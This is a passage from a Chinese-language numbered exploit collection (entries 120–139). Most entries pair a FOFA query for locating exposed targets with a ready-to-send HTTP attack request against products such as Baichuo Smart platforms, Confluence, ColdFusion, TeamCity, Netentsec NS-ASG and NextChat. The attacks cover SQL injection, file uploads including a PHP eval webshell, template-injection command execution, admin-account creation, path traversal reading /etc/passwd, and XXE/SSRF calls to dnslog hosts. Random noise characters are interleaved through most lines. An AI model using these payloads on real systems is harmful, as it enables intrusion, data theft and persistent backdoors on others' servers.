Te: trailers
! q8 p! V/ \7 ?6 t& D7 u1 V4 w, zConnection: close
# Q) l+ ]" T5 i8 x# a y# U# `7 f y' n2 F) o& s
src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|1234563 J% P* C4 M) n% g2 M
% F" S w, E, T. `" p" d% _# T
3 D4 b$ E; C6 k5 v4 h! L2 P* j6 d120. 北京百绰智能S40管理平台导入web.php任意文件上传- M) Q( Q! v: z& D- [8 i7 U# |1 a
CVE-2024-1253
7 ~6 V1 H, E C. j& l) e% sFOFA:title="Smart管理平台"
$ _! n' f: Z6 {8 D7 Q- r9 nPOST /useratte/web.php? HTTP/1.10 r5 U, Y Y" v( P& w( u
Host: ip:port3 G& m5 w$ W; l9 o, }- b- A! X$ U
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
' T# Y. E; ]+ ~! L! G |User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
: ^- b6 o1 Y, w5 E9 m5 iAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.81 F2 h- r! K" O( A0 L
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2$ F# H- Y r( u6 [3 J& a
Accept-Encoding: gzip, deflate0 C' a% S6 G! i4 |) H) _
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328! E% ~% o+ y7 b4 w- ^9 U( ?; H
Content-Length: 597# v- f& T) b2 A/ P
Origin: https://ip:port
/ }" P7 N; C. v% [Referer: https://ip:port/sysmanage/licence.php
$ v* F$ c/ j* pUpgrade-Insecure-Requests: 1
3 I" |. | Y6 F( K6 x) d. `Sec-Fetch-Dest: document
8 N& \7 {1 K SSec-Fetch-Mode: navigate& E8 y1 Z2 t' j$ b! j! x
Sec-Fetch-Site: same-origin7 p! ?, Q0 i# \* X& e
Sec-Fetch-User: ?1- b8 [8 W" y- f5 G N, a* V* r0 x+ u
Te: trailers
) f( H! m. G0 h h7 a& @8 L$ mConnection: close- w. K* _- d$ h+ q& J
$ Y' j' @. M4 O7 i4 @7 r* l-----------------------------42328904123665875270630079328/ L8 @/ v% B) g3 d h* e( V
Content-Disposition: form-data; name="file_upload"; filename="2.php" s7 T; K; @- |# o9 |) E5 ^3 z
Content-Type: application/octet-stream+ B* c# b0 T- t0 {2 o; H( p
7 U$ g& x; M. U7 U: Z, }<?php phpinfo()?>- s& F4 D' C, ~# A9 z* I
-----------------------------423289041236658752706300793287 J, b- @7 V# X% I8 g/ X
Content-Disposition: form-data; name="id_type"
& S2 {7 h/ t9 ]* ~0 k1 o0 B7 b3 Z: l3 q! U$ Q0 M. E
1
3 q/ t! M8 G6 ], ` m! Q! T# {" v-----------------------------42328904123665875270630079328, B$ ` d7 u, l- r g w J x' F: \
Content-Disposition: form-data; name="1_ck"
4 G; I2 G# b, J7 i' c* q& z+ T8 P U# L' g+ x
1_radhttp
/ Z, q+ y- C; B; n5 m5 i g" h-----------------------------42328904123665875270630079328
! O0 F X1 q2 t. o* x7 cContent-Disposition: form-data; name="mode"
( Z F2 J" v* w; n$ q' {8 t# v/ |! j# V n9 r& f( H1 H
import8 r$ k9 h) W' |. G# Z/ s0 w
-----------------------------42328904123665875270630079328
. [( I& q; t k: a& Z$ G( }" r/ ]
' |( i; t5 J9 ]9 z4 ]3 a' w d
) y) i7 s& G, J文件路径/upload/2.php" H+ I; J) M( ]1 w: I
# b( W+ ?) }+ ^* Z1 g; J121. 北京百绰智能S42管理平台userattestation.php任意文件上传
4 H- b0 `6 z0 p# DCVE-2024-1918( m- X* C% Y/ g1 M, A5 v9 h/ s$ k
FOFA:title="Smart管理平台"! B; P0 |/ f' X. n. G9 K( l
POST /useratte/userattestation.php HTTP/1.1
8 y; f4 K1 Q$ |# Y- aHost: 192.168.40.130:8443' Y8 O( Y; z9 i V: d
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac500 q+ d( a- t6 ]4 q, N" U
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
1 M: b9 [ A9 j. ]1 e7 ~Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
: ]7 H# A1 d wAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
7 X& U0 J4 W) Y b% w G+ fAccept-Encoding: gzip, deflate
8 M0 f: N8 m7 W7 k6 n4 Y/ FContent-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328( v" r( @% J! c
Content-Length: 592
2 ?, Z4 j+ v' KOrigin: https://192.168.40.130:84430 w2 | Y" n( o# a% {/ A4 s1 E( Z
Upgrade-Insecure-Requests: 1
% o s, H* m2 V+ X( b0 qSec-Fetch-Dest: document
1 m/ |4 G4 Z' _Sec-Fetch-Mode: navigate
1 ?5 z0 x' N- e/ BSec-Fetch-Site: same-origin+ n2 v2 u$ d! Q
Sec-Fetch-User: ?1' D+ Y$ r! v M
Te: trailers/ f8 B" t" j! @' V( M7 M) p
Connection: close1 n% T4 _% x2 v+ j& V- d: A
! p; A. X0 c5 `2 x, G2 y5 r: l0 x-----------------------------423289041236658752706300793285 ^3 i* D8 M! y+ ?2 b6 I
Content-Disposition: form-data; name="web_img"; filename="1.php"0 L w* I3 p0 t0 d, X8 z
Content-Type: application/octet-stream
6 j$ B3 O- [* B' ^3 D7 @7 P0 @* z) w# Z6 w6 a- H; N2 O. D- Y: L
<?php phpinfo();?>
; u+ o$ N; `: d5 q' L. b$ @5 a% k-----------------------------423289041236658752706300793285 Z/ J1 M6 v. v' q" R8 ~" Z
Content-Disposition: form-data; name="id_type") j# I3 n3 M0 h6 m) _8 ]
) j; n, N7 L8 n7 u. ]( J
1
: }( Z9 N# e5 G2 [, }-----------------------------42328904123665875270630079328; v0 ]+ t# `9 u
Content-Disposition: form-data; name="1_ck"4 \6 m' q9 d3 h6 t4 {8 _
6 y" {2 g+ x0 I2 q+ C, [1_radhttp
1 M! q- K; F" ~( l' I+ P& F/ O! n-----------------------------42328904123665875270630079328
) M7 ^+ t( f( ?Content-Disposition: form-data; name="hidwel"
- R) v0 x9 O0 S G; K5 I4 P# W9 E9 h: e- o( ^/ C4 n
set
/ }/ f- Q) G5 _9 i, k; R: Q. H2 _-----------------------------42328904123665875270630079328( i$ ?2 T, P9 r, i F8 d
3 M# |+ D3 K1 U, ]. \7 W, T: k& G/ L8 ?
/ ?/ C1 r) m) f0 H, zboot/web/upload/weblogo/1.php
5 R4 r, q. J3 J& ~( B8 O, P
! D8 ]: J W" X/ a- o% O' h' n/ t" Z122. 北京百绰智能s200管理平台/importexport.php sql注入
5 h b1 ~* |% E$ ^CVE-2024-27718FOFA:title="Smart管理平台"
6 X( I: N$ x. D+ A, F' q0 O. U4 p其中sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=是sql语句使用base64加密后的内容,原文:sql=select 1,database(),version()( s) _" ]. [9 m% Z; G! g
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1% i8 m) X! V5 q# [, Q5 k% h
Host: x.x.x.x2 {7 r V3 R" ^6 n* R
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
, z, O* L) `* S8 CUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0! k! q% C' ~# W& m
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
4 E$ ~: x8 O' X; Y `Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 w1 m: Z @6 s+ V+ n2 {Accept-Encoding: gzip, deflate, br) l8 M: F+ T$ \7 z c% J9 m# N9 B
Upgrade-Insecure-Requests: 1: [4 i9 @0 ~1 _! n t+ a- V8 E
Sec-Fetch-Dest: document/ I: r! w( m" y, Q0 \" Z* O/ ^# U
Sec-Fetch-Mode: navigate
% ~4 u' s- N/ B, K) ?Sec-Fetch-Site: none5 o8 j# p( y4 s$ I
Sec-Fetch-User: ?1! ~* E( g3 X, \+ a9 H
Te: trailers
: q) Y# t* _0 V$ @9 Q/ YConnection: close
$ q7 @5 ~) Y4 s4 L! z b5 b- z
/ `' ? a# K3 O& f+ k6 k& C' w0 b/ n) p) A; w
123. Atlassian Confluence 模板注入代码执行. I2 v4 U6 y: _
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"9 u1 V5 L! `- L
POST /template/aui/text-inline.vm HTTP/1.1: y$ `' o8 C4 j9 C( |6 S P6 ]
Host: localhost:80901 K5 k$ e! r6 ^* f* u9 Y2 b4 j
Accept-Encoding: gzip, deflate, br
( _3 J/ W! j. ]6 m# ~( r) bAccept: */*
' H X9 w0 a9 P: Y- x, uAccept-Language: en-US;q=0.9,en;q=0.8* e9 C% |# p# t) R- _( [
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
0 o0 f+ f; S$ Q8 y/ nConnection: close# o' L! @% {3 h
Content-Type: application/x-www-form-urlencoded
) `1 n& A* J% Y( }
8 e# O* |7 o U6 L( y( xlabel=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))& y8 x. H# o V
- w% j2 K2 X) g% s0 c" p2 V
9 G% V8 j1 C! o2 u124. 湖南建研工程质量检测系统任意文件上传
, s5 F( E9 c# Y2 PFOFA:body="/Content/Theme/Standard/webSite/login.css"
! u9 Q `% ~ j- S" ?, yPOST /Scripts/admintool?type=updatefile HTTP/1.1$ Y* B, d& l# }" v
Host: 192.168.40.130:8282
5 l, s& T. F0 ]4 Z: `. U6 ?( OUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* {" s4 Y1 d, E/ X$ ]Content-Length: 72
& w/ C9 T; f4 z' ^6 N! yAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
: A! i' |0 C' O# qAccept-Encoding: gzip, deflate, br
5 ]% V( c- a7 K' g! xAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2* H j, T7 Q; @4 E4 q
Connection: close! _: O3 E8 b( V3 k7 i, E
Content-Type: application/x-www-form-urlencoded d; J/ z4 K7 K! o
! ~ u! A; ?- f& w# b& n' Q/ U0 ^, C
filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>
) Y) _* Q. A S; Q/ L% R, q4 S& U* d% l7 @4 b) Y8 c$ O& ~
+ ?) {$ l! q9 r$ |http://192.168.40.130:8282/Scripts/abcgcg.aspx
* |+ J, h L: a% V! N: c' `7 w% \; r- b6 |1 s5 x
125. ConnectWise ScreenConnect身份验证绕过! g' [# k9 l) E! Y( c
CVE-2024-1709
& @. Z v1 P$ c2 IFOFA:icon_hash="-82958153"
l( z/ P2 p* T2 Xhttps://github.com/watchtowrlabs ... bypass-add-user-poc
/ C) W* S5 u" }1 [, n' u
) _" S/ l* u* c- s6 P
1 L5 i+ s0 N- j% w2 D使用方法- R% ]6 F) |9 I7 M7 a5 x3 a
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!
$ V/ A- p) D$ |+ q
! P* T: ^7 }* l% B f. _! R0 C
5 @1 B+ a s! M( A创建好用户后直接登录后台,可以执行系统命令。
' L; B5 c0 t5 T# ~& X
9 [" R- E, V2 F& u. W& h126. Aiohttp 路径遍历( A. \" N$ j5 N0 @9 G
FOFA:title=="ComfyUI"
5 Y5 @1 Q; R& O/ \1 [GET /static/../../../../../etc/passwd HTTP/1.17 Q" a/ ?- X1 l: H( e
Host: x.x.x.x
* T* s( @$ I5 \4 K- h% C: PUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.365 ], P) v8 U' o: n8 n( M: w
Connection: close
9 I8 H. G: b: |9 y) n, ~! MAccept: */*
$ }& E5 ^/ H7 C$ F1 R: N8 [Accept-Language: en
) u8 ~9 a; d; X. G3 n7 nAccept-Encoding: gzip
% e- d. X5 {7 F1 R T4 m! U: E3 o- v, j' \+ ]3 t
& {8 D. z( l" l& l127. 广联达Linkworks DataExchange.ashx XXE
, ~7 l( W/ W( N6 N3 _FOFA:body="Services/Identification/login.ashx" # a. R& _/ g; k
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.14 S' i, o( \7 O: v4 z; t% }4 j
Host: 192.168.40.130:8888' p$ T9 V9 y0 E/ {& E) k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
1 q+ u' G1 i' V0 xContent-Length: 415; o8 {, {) D6 {' n2 ~, I3 l3 V, U
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ F6 W) _( r+ g; ]3 z- r
Accept-Encoding: gzip, deflate. h( x& a3 E1 W) q. f" S
Accept-Language: zh-CN,zh;q=0.9
+ ^5 c& t) L9 ^+ ^/ |- MConnection: close
1 r( g2 S+ l7 V5 B3 j; `5 z5 VContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0% M# o$ p) x& ]( o/ r# _
Purpose: prefetch
6 v, l; M; L1 J/ R# gSec-Purpose: prefetch;prerender
- Q" t8 {& C2 `$ o1 R8 d5 O; C
( P5 @, C2 i( ?2 \& U" o6 d------WebKitFormBoundaryJGgV5l5ta05yAIe0
% D& E* B4 N. YContent-Disposition: form-data;name="SystemName"6 C; b9 y( Q4 J: z
: I- r6 M7 W) u( ~" DBIM
m ` A( {0 O' O" [ n------WebKitFormBoundaryJGgV5l5ta05yAIe0
$ A! I2 D) `3 mContent-Disposition: form-data;name="Params"
- ]; @) u( N$ ~% z4 PContent-Type: text/plain/ v5 H- {# O. q& T
5 o8 f& O3 {# B1 v7 d# }
<?xml version="1.0" encoding="UTF-8"?>
/ o3 ?6 N2 x; l/ x2 P<!DOCTYPE test [% P; V3 ]% u3 ~" l
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
/ M: m! F0 A* d$ q5 f% Y, O2 `( i]2 M& [2 ]4 n/ l4 O. k$ ?
>
. q2 L9 J) w3 M: `+ k z/ Q<test>&t;</test>
: V, k4 {/ c/ D L: U& R------WebKitFormBoundaryJGgV5l5ta05yAIe0--, H7 `% g6 w6 t1 E, K
& Q3 I+ l% U/ X2 e
! R( v# a* L7 `" h' x u( s/ s( r3 O
128. Adobe ColdFusion 反序列化
" D' `1 r* B- h. v: e6 h9 qCVE-2023-38203( g5 h' y! q' \" E
Adobe ColdFusion版本2018u17(以及早期版本)、2021u7(以及早期版本)和2023u1(以及早期版本)
5 D2 e$ G4 J) n0 n# yFOFA:app="Adobe-ColdFusion"
3 ]1 U/ c. z7 k2 v# ZPAYLOAD2 F7 K$ H5 U5 H" q$ f9 E6 q0 W
+ L) _* n+ w, Z7 Z4 z1 _% z3 H
129. Adobe ColdFusion 任意文件读取. k0 j9 X$ N' G( L g6 u
CVE-2024-20767
- T& i; W3 h! H* z7 U4 C0 H: dFOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request": N! p7 A7 O/ \8 n# `- T0 V) {2 Y
第一步,获取uuid, y5 |- |# s1 n* n2 R/ B/ m1 I
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
6 n* {8 d8 e. f; iHost: x.x.x.x
0 r2 o8 q# A; t: X3 o/ z9 k7 _User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
' B/ g' K/ t' dAccept: */*' ~! Y( s/ D$ q, e4 |
Accept-Encoding: gzip, deflate
" s! f- V3 ~7 a: ]' L+ UConnection: close9 i3 p' ?" Y, J1 b# N
# y3 x) O8 H8 `
- |5 O" `- a! r第二步,读取/etc/passwd文件9 f2 w- ?5 V( B7 Y) n) \* P+ e
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
5 A ~: u- } ]1 WHost: x.x.x.x2 m4 e3 J6 w% C- Q, N
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
5 Q- ?" {) G' W/ SAccept: */*; k+ L5 g" ]4 V( i, h! e. N
Accept-Encoding: gzip, deflate
# u& U& s3 N# ~! I/ R+ l% u1 zConnection: close
- ]- ~# [4 K2 Ouuid: 85f60018-a654-4410-a783-f81cbd5000b9
' {' L1 y% J) N) K$ `& l
' J5 N) F9 _4 z# n' k' D* e" Q8 N( Q& M/ m Q1 O7 M$ ?
130. Laykefu客服系统任意文件上传
7 Z0 B: `/ r1 ], b6 I% dFOFA:icon_hash="-334624619"
. R9 L- z7 ~7 E, f4 r1 H( vPOST /admin/users/upavatar.html HTTP/1.1
' Z. ?0 o0 | x* ZHost: 127.0.0.1
- |0 e n+ d4 C% nAccept: application/json, text/javascript, */*; q=0.01% p( ~) n* B/ y8 |' E6 Z7 Q+ H
X-Requested-With: XMLHttpRequest
" k0 z2 ]4 b3 {; Z4 xUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
$ ?4 N6 i T4 D6 tContent-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR7 R2 R7 _( m y: A; M; R% [9 }" z4 X; K
Accept-Encoding: gzip, deflate# I8 g' b u" F
Accept-Language: zh-CN,zh;q=0.93 `- s: V8 k5 L; \0 z
Cookie: user_name=1; user_id=3
+ v5 f5 U, C% }& EConnection: close
: J0 a/ g+ H8 g9 i5 ]. i4 d
0 n" l! u7 C$ T1 V6 m------WebKitFormBoundary3OCVBiwBVsNuB2kR
2 ]1 C5 O5 T% zContent-Disposition: form-data; name="file"; filename="1.php"# e# r. A# Q' f
Content-Type: image/png
' ?5 G2 @& `2 w+ s$ a6 y% q; x
- F& _# A: \8 o* \& p- u9 w<?php phpinfo();@eval($_POST['sec']);?>
) ~% ?8 x5 T3 j2 {4 ]( X/ F1 M------WebKitFormBoundary3OCVBiwBVsNuB2kR--
$ W7 s4 q1 h$ T6 B- `
3 T# e. P0 y: h! L* K4 n% h$ H9 [$ h" C: S' U
131. Mini-Tmall <=20231017 SQL注入
6 A" q, [9 E5 YFOFA:icon_hash="-2087517259"+ s, D# K4 W! E2 s& D' j0 H/ Q
后台地址:http://localhost:8080/tmall/admin7 L; x) G0 z7 _! i4 R1 o2 n7 p
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
4 p# t4 H/ z, N8 o" V8 r
, E4 V8 Y- t u3 U132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过: K/ ^ N$ ^4 h, v8 E2 _; O
CVE-2024-27198+ Y( F+ m& |' V9 L) h% K
FOFA:body="Log in to TeamCity"
1 d, N) x( q+ {& g% @6 O, ]POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.10 O6 G( t4 s) U$ e+ N
Host: 192.168.40.130:81117 ?9 ] o$ _" R7 L2 L9 |3 j4 F& }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.362 y+ U ]1 j% l) }0 Y
Accept: */*
: {* ^6 w% r& z) G4 lContent-Type: application/json1 _" j. f) R* ^8 y0 a6 }
Accept-Encoding: gzip, deflate
l- j% u( n4 l* @3 o' ?6 r) o0 Q; o# o
{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}9 E& p: P { ]
- N* ]+ v1 d: V3 X% d( c1 w$ Y4 N
6 V7 j$ ]) x* F5 k
CVE-2024-27199
/ G/ }; m$ {, H+ ]6 Y! n* {/res/../admin/diagnostic.jsp
8 `$ [1 t A0 @% C/.well-known/acme-challenge/../../admin/diagnostic.jsp: c8 j6 i: f' h" H; J, G
/update/../admin/diagnostic.jsp: G' c" a2 R$ _2 v+ p
F5 K% J: D: U* s# }
- T/ Q0 P* ~; o' ACVE-2024-27198-RCE.py5 S. J; {% E& \! D
: @4 f0 W% G6 q* x1 u5 u5 [, b
133. H5 云商城 file.php 文件上传' Y, B# t. ?/ Z3 \( X
FOFA:body="/public/qbsp.php"
8 Q. x+ h' d# Y) }POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
, c* l9 b" R# s* X: u- E- SHost: your-ip
/ [# M, P: K& l# I6 f, Y4 jUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
# w" W/ r" q% S$ HContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx4 m) V' K7 d, I0 c: P5 [, @! e
% T4 d+ w D$ c& {% t------WebKitFormBoundaryFQqYtrIWb8iBxUCx
' \7 R; [+ X% z! t- W4 jContent-Disposition: form-data; name="file"; filename="rce.php"- S3 T* T" \% f! Q D
Content-Type: application/octet-stream
. m I& d m/ P. A' Y' [ 4 j3 S. U. B( u: J! L
<?php system("cat /etc/passwd");unlink(__FILE__);?>8 ?9 q& h' s S3 p
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--
+ F3 _9 G3 i" x9 n! `) P! f2 V8 n
' N; o. Y/ g' S. _
# U! a2 n; _& A7 O1 [134. 网康NS-ASG应用安全网关index.php sql注入/ M1 E4 [4 L' u8 q% W0 E* p6 _
CVE-2024-23305 J; \& B8 l& v
Netentsec NS-ASG Application Security Gateway 6.3版本) a' {% A# J6 l5 J% X
FOFA:app="网康科技-NS-ASG安全网关"
. b8 J* ~/ n Q; S# U1 pPOST /protocol/index.php HTTP/1.19 q/ W8 Y+ R* m3 I$ h: l/ w
Host: x.x.x.x
1 T+ S! {( j Q3 NCookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
1 Q8 q, m+ C1 _7 o' XUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
, ^/ r; a& x+ J6 S' H. K; q8 jAccept: */*
+ u2 V6 i; B( uAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
" s; n5 L4 z( G) i! G( H2 IAccept-Encoding: gzip, deflate7 \+ s5 d) K. w, b0 S! S/ Y/ k! l
Sec-Fetch-Dest: empty$ P7 }- M/ E9 L8 X! M% w
Sec-Fetch-Mode: cors* c' o p, o9 {
Sec-Fetch-Site: same-origin
0 A: [2 d. I( Z, O2 ITe: trailers+ ~4 K+ t$ N8 s
Connection: close& v! a# S( l; O' D
Content-Type: application/x-www-form-urlencoded+ \( w k7 K, M7 ?1 A" r; z: u6 o
Content-Length: 263- N! f) X1 M4 Q6 T0 }, `& ^
$ j+ n! L6 i' Q
jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}; | T: o x) {+ e
7 L. Z- b" s! {
, I( B6 h4 |! B5 l135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
v! k, D a. }CVE-2024-2022" U) q& D$ M* h3 j5 T
Netentsec NS-ASG Application Security Gateway 6.3版本8 U0 K# b- L: s, C/ t+ [
FOFA:app="网康科技-NS-ASG安全网关" N Q* S& I( v! R5 z; Y: i" D C
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.18 S" L$ m3 Z. b
Host: x.x.x.x" }6 i! b( p/ I7 T1 R% E! p
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36" G" k$ b3 z5 l. D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7/ b, n, ]/ J% ~! g' D
Accept-Encoding: gzip, deflate4 M9 ?2 ~3 z$ [4 \7 B- v( Y6 \
Accept-Language: zh-CN,zh;q=0.9$ H- M. _! e9 H- ^. v1 Y! h
Connection: close
: u# \1 b: f( B0 h
) C& q4 W v, z' a5 k0 l$ c1 B5 t. b0 ?4 g" ^
136. NextChat cors SSRF/ ~6 f+ k+ {2 O
CVE-2023-497850 B$ n e. S5 h1 a. i4 Z, G' _
FOFA:title="NextChat"
+ q/ x4 r: b8 w1 o9 IGET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1+ j- C8 e3 @+ d: `
Host: x.x.x.x:100005 h' b7 P5 `) _+ z+ `$ M
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
5 i. |4 O. N( \' L; l3 mConnection: close
0 L3 o3 q y5 I0 Z' @Accept: */*9 n8 Q2 }7 k, P; V7 p0 O2 ~( u
Accept-Language: en
* e) W9 a2 \# I+ _) AAccept-Encoding: gzip
/ k% m7 P% P1 b7 P O# x" }$ r- R2 |) F v
9 w# I9 ~" P4 {; U6 `
137. 福建科立迅通信指挥调度平台down_file.php sql注入
) E3 H; i1 e- ]( P+ N3 C$ bCVE-2024-2620
8 |% D a% h4 a0 Q) GFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
: J- p" C! Q8 A w; T1 X% j7 uGET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1 R4 v& } p g+ K$ f' l* F! i
Host: x.x.x.x* {6 Q3 y" ?- z4 ?: @
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0( Y) M: ?: ~ d9 z% @' d6 c" r
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8! u9 G( E0 W7 ]1 |$ A; K
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 ^$ s! n2 L1 x+ U
Accept-Encoding: gzip, deflate, br5 W" I. j$ C3 B- Z$ l
Connection: close
9 c" Z7 U% U2 k' |7 XCookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
" V: b& {/ K: e. q5 AUpgrade-Insecure-Requests: 1- U8 P/ s0 D7 A: N( M/ G2 W
7 P% X: w% V! L E# u: k
5 U$ D3 {# ~* y& y- N$ \2 z0 i+ k8 P138. 福建科立讯通信指挥调度平台pwd_update.php sql注入' W9 G7 B% O( L I, Q6 G
CVE-2024-2621
/ }7 p3 u+ f( QFOFA:body="app/structure/departments.php" || app="指挥调度管理平台"5 j, ` b( m0 A! `
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
- I6 ~$ ~+ W9 j# DHost: x.x.x.x- m9 K& e' E( R
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0. Z/ L4 ~8 C) L# I3 G; j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 u0 N, k+ J" h% O+ }. Q# M/ E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- D& \, s6 V7 i$ m; e9 ~Accept-Encoding: gzip, deflate, br$ w; ?- D- o+ _% }% l9 N
Connection: close: y, F3 t: [/ m" O# i% m3 M8 f O
Upgrade-Insecure-Requests: 1
% i3 ?+ J$ x4 f1 Y$ q! _4 K' Z+ J
6 }1 G$ }( s5 e3 R" E, O' C
# k9 E. W' C6 f' K7 v( [8 l139. 福建科立讯通信指挥调度平台editemedia.php sql注入: Q% L+ P& a' M0 K. T( I: {
CVE-2024-2622 j. J& T# }# a& Z: v
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
, g) u% \ a0 l( O, |GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
